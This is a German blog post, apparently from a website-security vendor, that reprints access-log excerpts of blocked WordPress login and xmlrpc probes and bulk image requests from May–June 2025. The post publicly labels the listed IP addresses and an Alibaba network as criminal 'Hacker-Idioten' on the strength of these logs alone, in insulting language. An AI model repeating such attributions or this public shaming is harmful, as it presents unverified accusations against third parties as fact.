45.148.96.51 website*1.com – – [05/Jun/2025:13:56:45 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
15.204.43.172 website*1.com – – [05/Jun/2025:14:08:24 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0“
15.204.43.172 website*1.com – – [05/Jun/2025:14:08:25 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
102.130.117.188 website*1.com – – [05/Jun/2025:14:31:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
102.130.117.188 website*1.com – – [05/Jun/2025:14:31:22 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
162.240.214.41 website*1.com – – [05/Jun/2025:14:42:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
162.240.214.41 website*1.com – – [05/Jun/2025:14:42:26 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
162.240.232.97 website*1.com – – [05/Jun/2025:14:53:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
162.240.232.97 website*1.com – – [05/Jun/2025:14:53:45 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
85.190.242.233 website*1.com – – [05/Jun/2025:14:58:11 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
103.90.232.143 website*1.com – – [05/Jun/2025:15:05:08 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
103.90.232.143 website*1.com – – [05/Jun/2025:15:05:09 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0“
103.72.97.210 website*1.com – – [05/Jun/2025:15:16:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“
103.72.97.210 website*1.com – – [05/Jun/2025:15:16:47 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
162.0.209.174 website*1.com – – [05/Jun/2025:15:28:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36“
162.0.209.174 website*1.com – – [05/Jun/2025:15:28:09 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
135.148.55.164 website*1.com – – [05/Jun/2025:15:39:50 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
135.148.55.164 website*1.com – – [05/Jun/2025:15:39:51 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14“
185.252.31.27 website*1.com – – [05/Jun/2025:15:51:20 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50“
185.252.31.27 website*1.com – – [05/Jun/2025:15:51:21 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
103.173.227.63 website*1.com – – [05/Jun/2025:16:03:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1“
103.173.227.63 website*1.com – – [05/Jun/2025:16:03:01 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0“
91.151.95.70 website*1.com – – [05/Jun/2025:16:14:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36“
91.151.95.70 website*1.com – – [05/Jun/2025:16:14:40 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0“
217.182.158.226 website*1.com – – [05/Jun/2025:16:26:26 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“
217.182.158.226 website*1.com – – [05/Jun/2025:16:26:26 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“
67.205.59.102 website*1.com – – [05/Jun/2025:17:06:25 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
67.205.59.102 website*1.com – – [05/Jun/2025:17:06:25 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36“
14.160.24.238 website*1.com – – [05/Jun/2025:17:15:49 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0“
14.160.24.238 website*1.com – – [05/Jun/2025:17:15:50 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15“
95.217.76.131 website*1.com – – [05/Jun/2025:17:24:57 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0“
95.217.76.131 website*1.com – – [05/Jun/2025:17:24:57 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0“
103.163.214.6 website*1.com – – [05/Jun/2025:17:34:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36“
103.163.214.6 website*1.com – – [05/Jun/2025:17:34:06 +0200] „POST /wp-login.php HTTP/1.0“ 403 – „https:// website*1.com“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36“

JA, die Spielzeuge für diese Hacker-Idioten und dummen Script-Kiddies werden rar! *lol*

Diese kriminellen Hacker-Idioten und ScriptKiddies meinen nun, sie sind schlau, Haha.

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll Mai 2025

Das Hacker Protokoll Mai 2025

Dieses Hacker Protokoll Mai 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll Mai 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

Somit hier nun das Protokoll vom Mai. Man bedenke, die jeweiligen Tabellen sind immer nur ein ganz kleiner Auszug von dem, was da wirklich über den ganzen Tag auf den bestroffenen Websites versucht wurde. Zum Schutz der betroffenen Domains wurden diese ausgeschwärzt oder mit Stern (*) versehen.

**Protokoll-Auszüge vom Mai 2025 – Auch dieser Monat fängt ja wieder mal gut an lol!**

Die dummen LOGIN-IDIOTEN unter den Amateur-Hackern legen mal wieder los! Haha, nur zu dumm, dass es eben keine wp-login.php und es auch keine andere .php für das Login gibt und auch kein anderes bekanntes Login für die betroffenen Websites. Besonders amüsant sind auch die dummen Hacker-Idioten beim Zugriffsversuch über die XMLRPC.PHP! Die raffen nicht mal, was ein 403 bedeutet!

Da so einige MIT VERANTWORTLICHE PROVIDER anscheinend unsere Abuse-Mails nicht ernst nehmen, veröffentlichen wir hier nun ab März 2025 die armseeligen LOGIN-VERSUCHE so lange öffentlich, bis die hier MIT VERANTWORTLICHEN PROVIDER dies dann endlich beenden!

So geht es auch gleich los, hier die ersten Versuche aus den UNSICHEREN NETZWERKE, SERVERN und WEBSPACES! Zu Schutz des Website-Besitzers haben wir die betroffene Website in website*1 umbenannt!

PROTOKOLL-AUSZUG VOM 21. MAI 2025

Wir bekommen ja mittl. von vielen Website-Besitzern, die UNSER EFFEKTIVES SECURITY-TOOL nutzen, die entsprechenden Logfiles. 🙂

HEUTE, am 21. Mai 2025 fiel uns ein besonders dreisster versuchter BILDERKLAU auf, der mit verantwortliche Provider:

AS45102 – Alibaba (US) Technology Co., Ltd.

Die Netzwerke von diesen für uns eh mehr als nur fragwürdigen Provider sind ja schon länger auf SEHR VIELEN Websites gesperrt, beim Versuch eines Zugriffs kommt IMMER ein freundliches 403! Haha…

Hier nun der versuchte Bilderklau über diesen für uns sehr fragwürdigen Provider, bzgl. Abuse-Mail warten wir noch auf Antwort denn es sind auch FOTOGRAFIEN MIT COPYRIGHT dabei!!! Zum Schutz des Website-Besitzers wurde die Domain und die Bilder bewusst umbenannt:

47.79.203.40 www. website*1.de – – [21/May/2025:06:38:35 +0200] „GET /wp-content/uploads/2022/06/Bild1-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.203.40 www. website*1.de – – [21/May/2025:06:38:37 +0200] „GET /wp-content/uploads/2022/06/Bild2-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.192.2 www. website*1.de – – [21/May/2025:06:38:39 +0200] „GET /wp-content/uploads/2022/12/Bild2-300×300.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.203.40 www. website*1.de – – [21/May/2025:06:38:40 +0200] „GET /wp-content/uploads/2022/06/Bild3-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.192.2 www. website*1.de – – [21/May/2025:06:38:41 +0200] „GET /wp-content/uploads/2022/12/Bild4-300×300.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.192.2 www. website*1.de – – [21/May/2025:06:38:43 +0200] „GET /wp-content/uploads/2022/12/Bild4-300×300.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.203.202 www. website*1.de – – [21/May/2025:06:38:45 +0200] „GET /wp-content/uploads/2023/04/Bild5-1024×346.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.203.202 www. website*1.de – – [21/May/2025:06:38:47 +0200] „GET /wp-content/uploads/2023/04/Bild5-1024×346.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.203.202 www. website*1.de – – [21/May/2025:06:38:49 +0200] „GET /wp-content/uploads/2023/04/Bild5-1024×346.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.198.197 www. website*1.de – – [21/May/2025:06:38:56 +0200] „GET /wp-content/uploads/2023/01/Bild6.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.204.77 www. website*1.de – – [21/May/2025:06:38:56 +0200] „GET /wp-content/uploads/2022/05/Bild7.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.198.197 www. website*1.de – – [21/May/2025:06:38:58 +0200] „GET /wp-content/uploads/2023/01/Bild6.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.204.77 www. website*1.de – – [21/May/2025:06:38:59 +0200] „GET /wp-content/uploads/2022/05/Bild8-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.198.197 www. website*1.de – – [21/May/2025:06:39:00 +0200] „GET /wp-content/uploads/2023/01/Bild7.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.204.77 www. website*1.de – – [21/May/2025:06:39:01 +0200] „GET /wp-content/uploads/2022/05/Bild8-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.194.253 www. website*1.de – – [21/May/2025:06:39:22 +0200] „GET /wp-content/uploads/2022/01/Bild9-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.194.253 www. website*1.de – – [21/May/2025:06:39:25 +0200] „GET /wp-content/uploads/2022/01/Bild9-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.194.253 www. website*1.de – – [21/May/2025:06:39:27 +0200] „GET /wp-content/uploads/2022/01/Bild9-300×225.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15“
47.79.200.38 www. website*1.de – – [21/May/2025:06:39:29 +0200] „GET /wp-content/uploads/2022/11/Bild10-300×183.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1“
47.79.200.38 www. website*1.de – – [21/May/2025:06:39:31 +0200] „GET /wp-content/uploads/2022/11/Bild10-300×183.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1“
47.79.200.38 www. website*1.de – – [21/May/2025:06:39:35 +0200] „GET /wp-content/uploads/2022/11/Bild10-300×183.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1“
47.79.194.160 www. website*1.de – – [21/May/2025:06:39:35 +0200] „GET /wp-content/uploads/2023/02/Bild11-1024×344.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/122.0.6261.89 Mobile/15E148 Safari/604.1“
47.79.194.160 www. website*1.de – – [21/May/2025:06:39:38 +0200] „GET /wp-content/uploads/2023/02/Bild11-1024×344.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/122.0.6261.89 Mobile/15E148 Safari/604.1“
47.79.194.160 www. website*1.de – – [21/May/2025:06:39:41 +0200] „GET /wp-content/uploads/2023/02/Bild11-1024×344.jpg HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (iPad; CPU OS 17_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/122.0.6261.89 Mobile/15E148 Safari/604.1“
47.79.192.118 www. website*1.de – – [21/May/2025:06:39:52 +0200] „GET /wp-content/uploads/2022/12/Bild12-300×300.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.192.118 www. website*1.de – – [21/May/2025:06:39:56 +0200] „GET /wp-content/uploads/2022/12/Bild12-300×300.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“
47.79.192.118 www. website*1.de – – [21/May/2025:06:39:59 +0200] „GET /wp-content/uploads/2022/12/Bild12-300×300.webp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36“

Protokoll-Auszüge vom MAI 2025 – Mal wieder zu Beginn wieder die Login-Idioten.

Da so einige MIT VERANTWORTLICHE PROVIDER anscheinend unsere Abuse-Mails nicht ernst nehmen, veröffentlichen wir hier nun schon seit März 2025 die armseeligen LOGIN-VERSUCHE so lange öffentlich, bis die hier MIT VERANTWORTLICHEN PROVIDER dies dann endlich beenden!

So geht es auch gleich weiter, hier einige armseelige Login-Versuche aus den UNSICHEREN NETZWERKE, SERVERN und WEBSPACES! Zu Schutz des Website-Besitzers haben wir die betroffene Website in website*1 umbenannt!

Zu erwähnen sei hier noch folgendes:

Es sind recht viele unterschiedliche Provider, die scheinen auch nichts mehr zu merken.
So richtig dämliche Hacker-Idioten den trotz 403 wird es jeden Tag wieder versucht.
Es gibt auch gar keinen wp-login.php. Wir amüsieren uns jeden Tag über diese Vollpfosten.

78.107.255.174 website*1.com – – [06/May/2025:03:32:20 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0“
103.167.89.11 website*1.com – – [06/May/2025:03:32:21 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36“
124.156.240.51 website*1.com – – [06/May/2025:03:32:22 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36“
123.57.212.65 website*1.com – – [06/May/2025:03:32:27 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36“
147.50.231.109 website*1.com – – [06/May/2025:03:32:32 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0“
77.222.40.132 website*1.com – – [06/May/2025:03:32:34 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0“
124.156.240.51 website*1.com – – [06/May/2025:03:32:45 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36“
51.68.11.207 website*1.com – – [06/May/2025:03:32:46 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0“
185.5.99.151 website*1.com – – [06/May/2025:03:32:54 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36“
141.94.87.67 website*1.com – – [06/May/2025:03:33:36 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0“
188.65.220.86 website*1.com – – [06/May/2025:03:34:06 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.76 Safari/537.36“
103.158.108.3 website*1.com – – [06/May/2025:03:34:10 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36“
51.255.119.44 website*1.com – – [06/May/2025:04:28:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36“
195.78.94.193 website*1.com – – [06/May/2025:04:28:31 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36“
149.30.254.226 website*1.com – – [06/May/2025:04:28:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36“
124.156.240.51 website*1.com – – [06/May/2025:04:28:45 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0“
149.30.254.226 website*1.com – – [06/May/2025:04:28:51 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0“
124.156.240.51 website*1.com – – [06/May/2025:04:29:01 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36“
91.203.111.77 website*1.com – – [06/May/2025:04:29:04 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36“
193.202.110.34 website*1.com – – [06/May/2025:04:29:04 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0“
220.158.233.237 website*1.com – – [06/May/2025:04:29:08 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36“

Anhand der vielen Logfiles, die wir ja regelmäßig von mehreren Website-Besitzern bekommen, melden wir VERSTÄRKT fast täglich die Hacking-Versuche an die mit verantwortlichen Provider!

Dadurch sind innerhalb von Wochen die eh wirklich dummen Hacking-Versuche drastisch zurüchgegangen!

JA, die Spielzeuge für diese Hacker-Idioten und dummen Script-Kiddies werden rar! *lol*

Diese kriminellen Hacker-Idioten und ScriptKiddies meinen nun, sie sind schlau, Haha.

Seit wir viele Hacking-Versuche fast täglich melden, werden einige dieser Hacker-Idioten vorsichtiger. Man macht das erst mal ein ganz vorsichtiges GET! Kommt da ein 403, hören sie meist auf.

NUR ZU DUMM für diese armseeligen Hacker-Idioten denn auch das melden wir nun schon seit DEZEMBER 2024!

Die Hacker Vollpfosten des Monats

Weitere Auszüge der Logs von vielen Websites in Bezug auf diese Hacker-Idioten folgen diese Tage. 😉

Tipps, wie man die Website schützen kann findest du über den Link.

Hacker Protokoll April 2025

Das Hacker Protokoll April 2025

Dieses Hacker Protokoll April 2025 ist nicht mehr so umfangreich, da wir ja nicht jeden Zugriff dieser Hacker-Idioten posten. Trotzdem immer wieder diese unermüdlichen Login Idioten und Amateur Hacker, die es wieder und immer wieder versuchen, trotz einem 403, eine Homepage zu hacken.

Dieses Hacker Protokoll April 2025 soll ebenfalls so einige Hosting-Provider und Provider für Cloud´s endlich mal wachrütteln, damit sie ENDLICH die Webspaces ihrer Kunden besser vor diesen ganzen Login- und Hacker-Müll schützen!!! Viele Mails an Abuse der jeweiligen verantwortlichen Provider wurden geschrieben. Oft kam nur Blabla aber es ändert sich absolut NICHTS!

